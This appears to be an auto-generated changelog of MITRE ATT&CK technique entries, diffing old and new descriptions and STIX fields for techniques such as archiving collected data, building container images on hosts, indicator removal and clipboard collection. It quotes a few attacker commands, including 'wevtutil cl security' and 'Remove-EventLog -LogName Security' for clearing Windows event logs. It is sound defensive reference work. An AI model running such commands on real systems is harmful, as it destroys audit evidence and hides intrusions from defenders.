descriptionAdversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger.(Citation: Prevailion DarkWatchman 2021)Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.(Citation: Prevailion DarkWatchman 2021) For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ([Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) to evade.(Citation: ESET Grandoreiro April 2020) Adversaries typically abuse system features for this type of enumeration. For example, they may gather information through native system features such as [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) commands and [Native API](https://attack.mitre.org/techniques/T1106) functions.
external_references[1]['source_name']Prevailion DarkWatchman 2021ESET Grandoreiro April 2020
external_references[1]['description']Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A new evolution in fileless techniques. Retrieved January 10, 2022.ESET. (2020, April 28). Grandoreiro: How engorged can an EXE get?. Retrieved November 13, 2020.
external_references[1]['url']https://www.prevailion.com/darkwatchman-new-fileless-techniques/https://www.welivesecurity.com/2020/04/28/grandoreiro-how-engorged-can-exe-get/
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.21.3
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Prevailion DarkWatchman 2021', 'description': 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A new evolution in fileless techniques. Retrieved January 10, 2022.', 'url': 'https://www.prevailion.com/darkwatchman-new-fileless-techniques/'}
x_mitre_data_sourcesCommand: Command Execution
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesCommand: Command Execution

[T1560.001] Archive Collected Data: Archive via Utility

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may use utilities to compress and/or encrypt colt1Adversaries may use utilities to compress and/or encrypt col
>lected data prior to exfiltration. Many utilities include fu>lected data prior to exfiltration. Many utilities include fu
>nctionalities to compress, encrypt, or otherwise package dat>nctionalities to compress, encrypt, or otherwise package dat
>a into a format that is easier/more secure to transport.  Ad>a into a format that is easier/more secure to transport.  Ad
>versaries may abuse various utilities to compress or encrypt>versaries may abuse various utilities to compress or encrypt
> data before exfiltration. Some third party utilities may be> data before exfiltration. Some third party utilities may be
> preinstalled, such as <code>tar</code> on Linux and macOS o> preinstalled, such as <code>tar</code> on Linux and macOS o
>r <code>zip</code> on Windows systems. On Windows, <code>dia>r <code>zip</code> on Windows systems.   On Windows, <code>d
>ntz</code> or <code> makecab</code> may be used to package c>iantz</code> or <code> makecab</code> may be used to package
>ollected files into a cabinet (.cab) file. <code>diantz</cod> collected files into a cabinet (.cab) file. <code>diantz</c
>e> may also be used to download and compress files from remo>ode> may also be used to download and compress files from re
>te locations (i.e. [Remote Data Staging](https://attack.mitr>mote locations (i.e. [Remote Data Staging](https://attack.mi
>e.org/techniques/T1074/002)).(Citation: diantz.exe_lolbas) A>tre.org/techniques/T1074/002)).(Citation: diantz.exe_lolbas)
>dditionally, <code>xcopy</code> on Windows can copy files an> <code>xcopy</code> on Windows can copy files and directorie
>d directories with a variety of options.  Adversaries may us>s with a variety of options. Additionally, adversaries may u
>also third party utilities, such as 7-Zip, WinRAR, and Win>se [certutil](https://attack.mitre.org/software/S0160) to Ba
>Zip, to perform similar activities.(Citation: 7zip Homepage)>se64 encode collected data before exfiltration.   Adversarie
>(Citation: WinRAR Homepage)(Citation: WinZip Homepage)>s may use also third party utilities, such as 7-Zip, WinRAR,
 > and WinZip, to perform similar activities.(Citation: 7zip H
 >omepage)(Citation: WinRAR Homepage)(Citation: WinZip Homepag
 >e)
Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-20 17:17:48.612000+00:002023-04-14 19:28:21.394000+00:00
descriptionAdversaries may use utilities to compress and/or encrypt collected data prior to exfiltration. Many utilities include functionalities to compress, encrypt, or otherwise package data into a format that is easier/more secure to transport. Adversaries may abuse various utilities to compress or encrypt data before exfiltration. Some third party utilities may be preinstalled, such as tar on Linux and macOS or zip on Windows systems. On Windows, diantz or makecab may be used to package collected files into a cabinet (.cab) file. diantz may also be used to download and compress files from remote locations (i.e. [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002)).(Citation: diantz.exe_lolbas) Additionally, xcopy on Windows can copy files and directories with a variety of options. Adversaries may use also third party utilities, such as 7-Zip, WinRAR, and WinZip, to perform similar activities.(Citation: 7zip Homepage)(Citation: WinRAR Homepage)(Citation: WinZip Homepage)Adversaries may use utilities to compress and/or encrypt collected data prior to exfiltration. Many utilities include functionalities to compress, encrypt, or otherwise package data into a format that is easier/more secure to transport. Adversaries may abuse various utilities to compress or encrypt data before exfiltration. Some third party utilities may be preinstalled, such as tar on Linux and macOS or zip on Windows systems. On Windows, diantz or makecab may be used to package collected files into a cabinet (.cab) file. diantz may also be used to download and compress files from remote locations (i.e. [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002)).(Citation: diantz.exe_lolbas) xcopy on Windows can copy files and directories with a variety of options. Additionally, adversaries may use [certutil](https://attack.mitre.org/software/S0160) to Base64 encode collected data before exfiltration. Adversaries may use also third party utilities, such as 7-Zip, WinRAR, and WinZip, to perform similar activities.(Citation: 7zip Homepage)(Citation: WinRAR Homepage)(Citation: WinZip Homepage)
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_data_sources[0]Command: Command ExecutionFile: File Creation
x_mitre_data_sources[2]File: File CreationCommand: Command Execution
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsMark Wee

[T1197] BITS Jobs

Current version: 1.4

Version changed from: 1.3 → 1.4

Dropped Mitigations:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-14 19:21:26.447000+00:002023-04-21 12:21:40.927000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.31.4
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesCommand: Command Execution
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesCommand: Command Execution

[T1110] Brute Force

Current version: 2.5

Version changed from: 2.4 → 2.5

Dropped Mitigations:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-19 21:28:49.481000+00:002023-04-14 23:03:34.362000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_data_sources[0]User Account: User Account AuthenticationApplication Log: Application Log Content
x_mitre_data_sources[2]Application Log: Application Log ContentUser Account: User Account Authentication
x_mitre_version2.42.5
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/49.html', 'external_id': 'CAPEC-49'}

[T1612] Build Image on Host

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
New Description
t1Adversaries may build a container image directly on a host tt1Adversaries may build a container image directly on a host t
>o bypass defenses that monitor for the retrieval of maliciou>o bypass defenses that monitor for the retrieval of maliciou
>s images from a public registry. A remote <code>build</code>>s images from a public registry. A remote <code>build</code>
> request may be sent to the Docker API that includes a Docke> request may be sent to the Docker API that includes a Docke
>rfile that pulls a vanilla base image, such as alpine, from >rfile that pulls a vanilla base image, such as alpine, from 
>a public or local registry and then builds a custom image up>a public or local registry and then builds a custom image up
>on it.(Citation: Docker Build Image)  An adversary may take >on it.(Citation: Docker Build Image)  An adversary may take 
>advantage of that <code>build</code> API to build a custom i>advantage of that <code>build</code> API to build a custom i
>mage on the host that includes malware downloaded from their>mage on the host that includes malware downloaded from their
> C2 server, and then they then may utilize [Deploy Container> C2 server, and then they may utilize [Deploy Container](htt
>](https://attack.mitre.org/techniques/T1610) using that cust>ps://attack.mitre.org/techniques/T1610) using that custom im
>om image.(Citation: Aqua Build Images on Hosts)(Citation: Aq>age.(Citation: Aqua Build Images on Hosts)(Citation: Aqua Se
>ua Security Cloud Native Threat Report June 2021) If the bas>curity Cloud Native Threat Report June 2021) If the base ima
>e image is pulled from a public registry, defenses will like>ge is pulled from a public registry, defenses will likely no
>ly not detect the image as malicious since it’s a vanilla im>t detect the image as malicious since it’s a vanilla image. 
>age. If the base image already resides in a local registry, >If the base image already resides in a local registry, the p
>the pull may be considered even less suspicious since the im>ull may be considered even less suspicious since the image i
>age is already in the environment. >s already in the environment. 
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User', 'root']
values_changed
STIX FieldOld valueNew Value
modified2022-04-01 13:04:00.946000+00:002023-04-15 16:22:09.807000+00:00
descriptionAdversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. A remote build request may be sent to the Docker API that includes a Dockerfile that pulls a vanilla base image, such as alpine, from a public or local registry and then builds a custom image upon it.(Citation: Docker Build Image) An adversary may take advantage of that build API to build a custom image on the host that includes malware downloaded from their C2 server, and then they then may utilize [Deploy Container](https://attack.mitre.org/techniques/T1610) using that custom image.(Citation: Aqua Build Images on Hosts)(Citation: Aqua Security Cloud Native Threat Report June 2021) If the base image is pulled from a public registry, defenses will likely not detect the image as malicious since it’s a vanilla image. If the base image already resides in a local registry, the pull may be considered even less suspicious since the image is already in the environment. Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. A remote build request may be sent to the Docker API that includes a Dockerfile that pulls a vanilla base image, such as alpine, from a public or local registry and then builds a custom image upon it.(Citation: Docker Build Image) An adversary may take advantage of that build API to build a custom image on the host that includes malware downloaded from their C2 server, and then they may utilize [Deploy Container](https://attack.mitre.org/techniques/T1610) using that custom image.(Citation: Aqua Build Images on Hosts)(Citation: Aqua Security Cloud Native Threat Report June 2021) If the base image is pulled from a public registry, defenses will likely not detect the image as malicious since it’s a vanilla image. If the base image already resides in a local registry, the pull may be considered even less suspicious since the image is already in the environment.
external_references[1]['source_name']Docker Build ImageAqua Build Images on Hosts
external_references[1]['description']Docker. ( null). Docker Engine API v1.41 Reference - Build an Image. Retrieved March 30, 2021.Assaf Morag. (2020, July 15). Threat Alert: Attackers Building Malicious Images on Your Hosts. Retrieved March 29, 2021.
external_references[1]['url']https://docs.docker.com/engine/api/v1.41/#operation/ImageBuildhttps://blog.aquasec.com/malicious-container-image-docker-container-host
external_references[2]['source_name']Aqua Build Images on HostsDocker Build Image
external_references[2]['description']Assaf Morag. (2020, July 15). Threat Alert: Attackers Building Malicious Images on Your Hosts. Retrieved March 29, 2021.Docker. ( null). Docker Engine API v1.41 Reference - Build an Image. Retrieved March 30, 2021.
external_references[2]['url']https://blog.aquasec.com/malicious-container-image-docker-container-hosthttps://docs.docker.com/engine/api/v1.41/#operation/ImageBuild
x_mitre_data_sources[0]Network Traffic: Network Traffic ContentNetwork Traffic: Network Connection Creation
x_mitre_data_sources[1]Image: Image CreationNetwork Traffic: Network Traffic Flow
x_mitre_data_sources[2]Network Traffic: Network Traffic FlowImage: Image Creation
x_mitre_data_sources[3]Network Traffic: Network Connection CreationNetwork Traffic: Network Traffic Content
x_mitre_version1.21.3

[T1548.002] Abuse Elevation Control Mechanism: Bypass User Account Control

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-19 15:11:20.036000+00:002023-04-21 12:35:39.112000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version2.02.1
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesCommand: Command Execution
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesCommand: Command Execution

[T1218.003] System Binary Proxy Execution: CMSTP

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2022-03-11 18:38:36.109000+00:002023-04-21 12:24:13.666000+00:00
external_references[1]['source_name']Microsoft Connection Manager Oct 2009Twitter CMSTP Usage Jan 2018
external_references[1]['description']Microsoft. (2009, October 8). How Connection Manager Works. Retrieved April 11, 2018.Carr, N. (2018, January 31). Here is some early bad cmstp.exe... Retrieved April 11, 2018.
external_references[1]['url']https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2003/cc786431(v=ws.10)https://twitter.com/ItsReallyNick/status/958789644165894146
external_references[2]['source_name']Twitter CMSTP Usage Jan 2018Microsoft Connection Manager Oct 2009
external_references[2]['description']Carr, N. (2018, January 31). Here is some early bad cmstp.exe... Retrieved April 11, 2018.Microsoft. (2009, October 8). How Connection Manager Works. Retrieved April 11, 2018.
external_references[2]['url']https://twitter.com/ItsReallyNick/status/958789644165894146https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2003/cc786431(v=ws.10)
external_references[4]['source_name']Twitter CMSTP Jan 2018GitHub Ultimate AppLocker Bypass List
external_references[4]['description']Tyrer, N. (2018, January 30). CMSTP.exe - remote .sct execution applocker bypass. Retrieved April 11, 2018.Moe, O. (2018, March 1). Ultimate AppLocker Bypass List. Retrieved April 10, 2018.
external_references[4]['url']https://twitter.com/NickTyrer/status/958450014111633408https://github.com/api0cradle/UltimateAppLockerByPassList
external_references[5]['source_name']GitHub Ultimate AppLocker Bypass ListEndurant CMSTP July 2018
external_references[5]['description']Moe, O. (2018, March 1). Ultimate AppLocker Bypass List. Retrieved April 10, 2018.Seetharaman, N. (2018, July 7). Detecting CMSTP-Enabled Code Execution and UAC Bypass With Sysmon.. Retrieved August 6, 2018.
external_references[5]['url']https://github.com/api0cradle/UltimateAppLockerByPassListhttp://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/
external_references[6]['source_name']Endurant CMSTP July 2018Twitter CMSTP Jan 2018
external_references[6]['description']Seetharaman, N. (2018, July 7). Detecting CMSTP-Enabled Code Execution and UAC Bypass With Sysmon.. Retrieved August 6, 2018.Tyrer, N. (2018, January 30). CMSTP.exe - remote .sct execution applocker bypass. Retrieved April 11, 2018.
external_references[6]['url']http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/https://twitter.com/NickTyrer/status/958450014111633408
x_mitre_version2.02.1

[T1070.003] Indicator Removal: Clear Command History

Current version: 1.4

Version changed from: 1.3 → 1.4

Dropped Mitigations:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-01 21:58:56.496000+00:002023-04-07 17:20:44.770000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_data_sources[0]File: File ModificationUser Account: User Account Authentication
x_mitre_data_sources[1]File: File DeletionCommand: Command Execution
x_mitre_data_sources[2]User Account: User Account AuthenticationFile: File Deletion
x_mitre_data_sources[3]Command: Command ExecutionFile: File Modification
x_mitre_version1.31.4

[T1070.008] Indicator Removal: Clear Mailbox Data

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may modify mail application data to remove evidet1Adversaries may modify mail and mail application data to rem
>nce of their activity. Email applications allow users and ot>ove evidence of their activity. Email applications allow use
>her programs to export and delete mailbox data via command l>rs and other programs to export and delete mailbox data via 
>ine tools or use of APIs. Mail application data can be email>command line tools or use of APIs. Mail application data can
>s or logs generated by the application or operating system, > be emails, email metadata, or logs generated by the applica
>such as export requests.   Adversaries may manipulate email >tion or operating system, such as export requests.   Adversa
>mailbox data to remove logs and artifacts, such as evidence >ries may manipulate emails and mailbox data to remove logs, 
>of [Phishing](https://attack.mitre.org/techniques/T1566)/[In>artifacts, and metadata, such as evidence of [Phishing](http
>ternal Spearphishing](https://attack.mitre.org/techniques/T1>s://attack.mitre.org/techniques/T1566)/[Internal Spearphishi
>534), [Email Collection](https://attack.mitre.org/techniques>ng](https://attack.mitre.org/techniques/T1534), [Email Colle
>/T1114), [Mail Protocols](https://attack.mitre.org/technique>ction](https://attack.mitre.org/techniques/T1114), [Mail Pro
>s/T1071/003) for command and control, or email-based exfiltr>tocols](https://attack.mitre.org/techniques/T1071/003) for c
>ation such as [Exfiltration Over Alternative Protocol](https>ommand and control, or email-based exfiltration such as [Exf
>://attack.mitre.org/techniques/T1048). For example, to remov>iltration Over Alternative Protocol](https://attack.mitre.or
>e evidence on Exchange servers adversaries have used the <co>g/techniques/T1048). For example, to remove evidence on Exch
>de>ExchangePowerShell</code> [PowerShell](https://attack.mit>ange servers adversaries have used the <code>ExchangePowerSh
>re.org/techniques/T1059/001) module, including <code>Remove->ell</code> [PowerShell](https://attack.mitre.org/techniques/
>MailboxExportRequest</code> to remove evidence of mailbox ex>T1059/001) module, including <code>Remove-MailboxExportReque
>ports.(Citation: Volexity SolarWinds)(Citation: ExchangePowe>st</code> to remove evidence of mailbox exports.(Citation: V
>rShell Module) On Linux and macOS, adversaries may also dele>olexity SolarWinds)(Citation: ExchangePowerShell Module) On 
>te emails through a command line utility called <code>mail</>Linux and macOS, adversaries may also delete emails through 
>code>  or use [AppleScript](https://attack.mitre.org/techniq>a command line utility called <code>mail</code>  or use [App
>ues/T1059/002) to interact with APIs on macOS.(Citation: Cyb>leScript](https://attack.mitre.org/techniques/T1059/002) to 
>ereason Cobalt Kitty 2017)(Citation: mailx man page)>interact with APIs on macOS.(Citation: Cybereason Cobalt Kit
 >ty 2017)(Citation: mailx man page)  Adversaries may also rem
 >ove emails and metadata/headers indicative of spam or suspic
 >ious activity (for example, through the use of organization-
 >wide transport rules) to reduce the likelihood of malicious 
 >emails being detected by security products.(Citation: Micros
 >oft OAuth Spam 2022)

New Mitigations:

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_contributors['Liran Ravich, CardinalOps']
values_changed
STIX FieldOld valueNew Value
modified2022-10-17 17:41:43.552000+00:002023-04-12 20:56:32.743000+00:00
descriptionAdversaries may modify mail application data to remove evidence of their activity. Email applications allow users and other programs to export and delete mailbox data via command line tools or use of APIs. Mail application data can be emails or logs generated by the application or operating system, such as export requests. Adversaries may manipulate email mailbox data to remove logs and artifacts, such as evidence of [Phishing](https://attack.mitre.org/techniques/T1566)/[Internal Spearphishing](https://attack.mitre.org/techniques/T1534), [Email Collection](https://attack.mitre.org/techniques/T1114), [Mail Protocols](https://attack.mitre.org/techniques/T1071/003) for command and control, or email-based exfiltration such as [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048). For example, to remove evidence on Exchange servers adversaries have used the ExchangePowerShell [PowerShell](https://attack.mitre.org/techniques/T1059/001) module, including Remove-MailboxExportRequest to remove evidence of mailbox exports.(Citation: Volexity SolarWinds)(Citation: ExchangePowerShell Module) On Linux and macOS, adversaries may also delete emails through a command line utility called mail or use [AppleScript](https://attack.mitre.org/techniques/T1059/002) to interact with APIs on macOS.(Citation: Cybereason Cobalt Kitty 2017)(Citation: mailx man page)Adversaries may modify mail and mail application data to remove evidence of their activity. Email applications allow users and other programs to export and delete mailbox data via command line tools or use of APIs. Mail application data can be emails, email metadata, or logs generated by the application or operating system, such as export requests. Adversaries may manipulate emails and mailbox data to remove logs, artifacts, and metadata, such as evidence of [Phishing](https://attack.mitre.org/techniques/T1566)/[Internal Spearphishing](https://attack.mitre.org/techniques/T1534), [Email Collection](https://attack.mitre.org/techniques/T1114), [Mail Protocols](https://attack.mitre.org/techniques/T1071/003) for command and control, or email-based exfiltration such as [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048). For example, to remove evidence on Exchange servers adversaries have used the ExchangePowerShell [PowerShell](https://attack.mitre.org/techniques/T1059/001) module, including Remove-MailboxExportRequest to remove evidence of mailbox exports.(Citation: Volexity SolarWinds)(Citation: ExchangePowerShell Module) On Linux and macOS, adversaries may also delete emails through a command line utility called mail or use [AppleScript](https://attack.mitre.org/techniques/T1059/002) to interact with APIs on macOS.(Citation: Cybereason Cobalt Kitty 2017)(Citation: mailx man page) Adversaries may also remove emails and metadata/headers indicative of spam or suspicious activity (for example, through the use of organization-wide transport rules) to reduce the likelihood of malicious emails being detected by security products.(Citation: Microsoft OAuth Spam 2022)
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Microsoft OAuth Spam 2022', 'description': 'Microsoft. (2023, September 22). Malicious OAuth applications abuse cloud email services to spread spam. Retrieved March 13, 2023.', 'url': 'https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/'}
x_mitre_data_sourcesProcess: Process Creation
x_mitre_data_sourcesApplication Log: Application Log Content
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: Process Creation

[T1070.009] Indicator Removal: Clear Persistence

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may clear artifacts associated with previously et1Adversaries may clear artifacts associated with previously e
>stablished persistence on a host system to remove evidence o>stablished persistence on a host system to remove evidence o
>f their activity. This may involve various actions, such as >f their activity. This may involve various actions, such as 
>removing services, deleting executables, [Modify Registry](h>removing services, deleting executables, [Modify Registry](h
>ttps://attack.mitre.org/techniques/T1112), [Plist File Modif>ttps://attack.mitre.org/techniques/T1112), [Plist File Modif
>ication](https://attack.mitre.org/techniques/T1647), or othe>ication](https://attack.mitre.org/techniques/T1647), or othe
>r methods of cleanup to prevent defenders from collecting ev>r methods of cleanup to prevent defenders from collecting ev
>idence of their persistent presence.(Citation: Cylance Dust >idence of their persistent presence.(Citation: Cylance Dust 
>Storm)  In some instances, artifacts of persistence may also>Storm) Adversaries may also delete accounts previously creat
> be removed once an adversary’s persistence is executed in o>ed to maintain persistence (i.e. [Create Account](https://at
>rder to prevent errors with the new instance of the malware.>tack.mitre.org/techniques/T1136)).(Citation: Talos - Cisco A
>(Citation: NCC Group Team9 June 2020)>ttack 2022)  In some instances, artifacts of persistence may
 > also be removed once an adversary’s persistence is executed
 > in order to prevent errors with the new instance of the mal
 >ware.(Citation: NCC Group Team9 June 2020)

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_contributors['Gavin Knapp']
values_changed
STIX FieldOld valueNew Value
modified2022-10-18 23:40:32.055000+00:002023-04-11 22:30:01.227000+00:00
descriptionAdversaries may clear artifacts associated with previously established persistence on a host system to remove evidence of their activity. This may involve various actions, such as removing services, deleting executables, [Modify Registry](https://attack.mitre.org/techniques/T1112), [Plist File Modification](https://attack.mitre.org/techniques/T1647), or other methods of cleanup to prevent defenders from collecting evidence of their persistent presence.(Citation: Cylance Dust Storm) In some instances, artifacts of persistence may also be removed once an adversary’s persistence is executed in order to prevent errors with the new instance of the malware.(Citation: NCC Group Team9 June 2020)Adversaries may clear artifacts associated with previously established persistence on a host system to remove evidence of their activity. This may involve various actions, such as removing services, deleting executables, [Modify Registry](https://attack.mitre.org/techniques/T1112), [Plist File Modification](https://attack.mitre.org/techniques/T1647), or other methods of cleanup to prevent defenders from collecting evidence of their persistent presence.(Citation: Cylance Dust Storm) Adversaries may also delete accounts previously created to maintain persistence (i.e. [Create Account](https://attack.mitre.org/techniques/T1136)).(Citation: Talos - Cisco Attack 2022) In some instances, artifacts of persistence may also be removed once an adversary’s persistence is executed in order to prevent errors with the new instance of the malware.(Citation: NCC Group Team9 June 2020)
external_references[2]['source_name']NCC Group Team9 June 2020Talos - Cisco Attack 2022
external_references[2]['description']Pantazopoulos, N. (2020, June 2). In-depth analysis of the new Team9 malware family. Retrieved December 1, 2020.Nick Biasini. (2022, August 10). Cisco Talos shares insights related to recent cyber attack on Cisco. Retrieved March 9, 2023.
external_references[2]['url']https://research.nccgroup.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/https://blog.talosintelligence.com/recent-cyber-attack/
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_data_sources[7]Windows Registry: Windows Registry Key DeletionUser Account: User Account Deletion
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'NCC Group Team9 June 2020', 'description': 'Pantazopoulos, N. (2020, June 2). In-depth analysis of the new Team9 malware family. Retrieved December 1, 2020.', 'url': 'https://research.nccgroup.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/'}
x_mitre_data_sourcesCommand: Command Execution
x_mitre_data_sourcesWindows Registry: Windows Registry Key Deletion
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesCommand: Command Execution

[T1070.001] Indicator Removal: Clear Windows Event Logs

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may clear Windows Event Logs to hide the activitt1Adversaries may clear Windows Event Logs to hide the activit
>y of an intrusion. Windows Event Logs are a record of a comp>y of an intrusion. Windows Event Logs are a record of a comp
>uter's alerts and notifications. There are three system-defi>uter's alerts and notifications. There are three system-defi
>ned sources of events: System, Application, and Security, wi>ned sources of events: System, Application, and Security, wi
>th five event types: Error, Warning, Information, Success Au>th five event types: Error, Warning, Information, Success Au
>dit, and Failure Audit.  The event logs can be cleared with >dit, and Failure Audit.  The event logs can be cleared with 
>the following utility commands:  * <code>wevtutil cl system<>the following utility commands:  * <code>wevtutil cl system<
>/code> * <code>wevtutil cl application</code> * <code>wevtut>/code> * <code>wevtutil cl application</code> * <code>wevtut
>il cl security</code>  These logs may also be cleared throug>il cl security</code>  These logs may also be cleared throug
>h other mechanisms, such as the event viewer GUI or [PowerSh>h other mechanisms, such as the event viewer GUI or [PowerSh
>ell](https://attack.mitre.org/techniques/T1059/001).>ell](https://attack.mitre.org/techniques/T1059/001). For exa
 >mple, adversaries may use the PowerShell command <code>Remov
 >e-EventLog -LogName Security</code> to delete the Security E
 >ventLog and after reboot, disable future logging. Note: even
 >ts may still be generated and logged in the .evtx file betwe
 >en the time the command is run and the reboot.(Citation: dis
 >able_win_evt_logging)

Dropped Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_contributors['Lucas Heiligenstein']
values_changed
STIX FieldOld valueNew Value
modified2022-04-20 13:02:07.168000+00:002023-04-12 15:32:03.205000+00:00
descriptionAdversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs are a record of a computer's alerts and notifications. There are three system-defined sources of events: System, Application, and Security, with five event types: Error, Warning, Information, Success Audit, and Failure Audit. The event logs can be cleared with the following utility commands: * wevtutil cl system * wevtutil cl application * wevtutil cl security These logs may also be cleared through other mechanisms, such as the event viewer GUI or [PowerShell](https://attack.mitre.org/techniques/T1059/001).Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs are a record of a computer's alerts and notifications. There are three system-defined sources of events: System, Application, and Security, with five event types: Error, Warning, Information, Success Audit, and Failure Audit. The event logs can be cleared with the following utility commands: * wevtutil cl system * wevtutil cl application * wevtutil cl security These logs may also be cleared through other mechanisms, such as the event viewer GUI or [PowerShell](https://attack.mitre.org/techniques/T1059/001). For example, adversaries may use the PowerShell command Remove-EventLog -LogName Security to delete the Security EventLog and after reboot, disable future logging. Note: events may still be generated and logged in the .evtx file between the time the command is run and the reboot.(Citation: disable_win_evt_logging)
external_references[1]['source_name']Microsoft Clear-EventLogdisable_win_evt_logging
external_references[1]['description']Microsoft. (n.d.). Clear-EventLog. Retrieved July 2, 2018.Heiligenstein, L. (n.d.). REP-25: Disable Windows Event Logging. Retrieved April 7, 2022.
external_references[1]['url']https://docs.microsoft.com/powershell/module/microsoft.powershell.management/clear-eventloghttps://ptylu.github.io/content/report/report.html?report=25
external_references[2]['source_name']Microsoft EventLog.ClearMicrosoft Clear-EventLog
external_references[2]['description']Microsoft. (n.d.). EventLog.Clear Method (). Retrieved July 2, 2018.Microsoft. (n.d.). Clear-EventLog. Retrieved July 2, 2018.
external_references[2]['url']https://msdn.microsoft.com/library/system.diagnostics.eventlog.clear.aspxhttps://docs.microsoft.com/powershell/module/microsoft.powershell.management/clear-eventlog
external_references[3]['source_name']Microsoft wevtutil Oct 2017Microsoft EventLog.Clear
external_references[3]['description']Plett, C. et al.. (2017, October 16). wevtutil. Retrieved July 2, 2018.Microsoft. (n.d.). EventLog.Clear Method (). Retrieved July 2, 2018.
external_references[3]['url']https://docs.microsoft.com/windows-server/administration/windows-commands/wevtutilhttps://msdn.microsoft.com/library/system.diagnostics.eventlog.clear.aspx
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_data_sources[0]Process: OS API ExecutionCommand: Command Execution
x_mitre_data_sources[2]Command: Command ExecutionProcess: OS API Execution
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Microsoft wevtutil Oct 2017', 'description': 'Plett, C. et al.. (2017, October 16). wevtutil. Retrieved July 2, 2018.', 'url': 'https://docs.microsoft.com/windows-server/administration/windows-commands/wevtutil'}

[T1115] Clipboard Data

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may collect data stored in the clipboard from ust1Adversaries may collect data stored in the clipboard from us
>ers copying information within or between applications.   In>ers copying information within or between applications.   Fo
> Windows, Applications can access clipboard data by using th>r example, on Windows adversaries can access clipboard data 
>e Windows API.(Citation: MSDN Clipboard) OSX provides a nati>by using <code>clip.exe</code> or <code>Get-Clipboard</code>
>ve command, <code>pbpaste</code>, to grab clipboard contents>.(Citation: MSDN Clipboard)(Citation: clip_win_server)(Citat
>.(Citation: Operating with EmPyre)>ion: CISA_AA21_200B) Additionally, adversaries may monitor t
 >hen replace users’ clipboard with their data (e.g., [Transmi
 >tted Data Manipulation](https://attack.mitre.org/techniques/
 >T1565/002)).(Citation: mining_ruby_reversinglabs)  macOS and
 > Linux also have commands, such as <code>pbpaste</code>, to 
 >grab clipboard contents.(Citation: Operating with EmPyre)

Dropped Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
